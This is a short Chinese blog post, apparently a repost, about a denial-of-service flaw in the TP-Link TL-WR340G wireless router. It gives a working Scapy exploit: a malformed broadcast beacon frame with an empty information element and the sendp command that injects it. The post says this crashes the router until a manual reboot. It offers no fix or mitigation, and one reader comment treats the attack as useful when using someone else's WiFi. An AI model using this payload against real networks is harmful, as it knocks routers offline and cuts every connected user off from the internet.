TL-WR340G无线路由器拒绝服务漏洞

TL-WR340G是TP-Link出品的一款轻量级无线路由器,近日有国外黑客发现了这款路由器上的一个拒绝服务漏洞,只要发送一个简单的畸形包到路由器,便可使路由器停止工作,需要手动重启路由器才能恢复正常,算是比较严重的了

漏洞细节:

型号:TL-WR340G无线路由器
固件版本: 4.7.11  Build 101102 Rel.60376n
硬件版本:WR340G v3

触发漏洞的过程非常简单,需要用到网络软件Scapy,构造包的详情如下:

fr = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2="<AP 
MAC>",addr3="<AP MAC>")/Dot11Beacon()/Dot11Elt()

接下来发送数据包:

sendp(fr,iface="injection capable wireless interface",count=5)

攻击成功之后,路由器将直接挂掉,具体表现就是不管已经连接还是未连接的客户端都无法连接互联网,除非手动登入管理界面软重启或者断电重启。

 

本文标题:TL-WR340G无线路由器拒绝服务漏洞
本文链接:https://www.nigesb.com/tl-wr340g-wireless-denial-of-service.html
订阅本站:http://www.nigesb.com/feed
转载请注明来源,如果喜欢本站可以Feed订阅本站。

发表评论?

8 条评论。

  1. 这个对蹭网pin死的时候很有用.

  2. 怪不得我路由器常出问题,就是这款

  3. 交换友链吧,http://www.gitlibs.com/

  4. 还不如deauth攻击来的直接

发表评论


注意 - 你可以用以下 HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>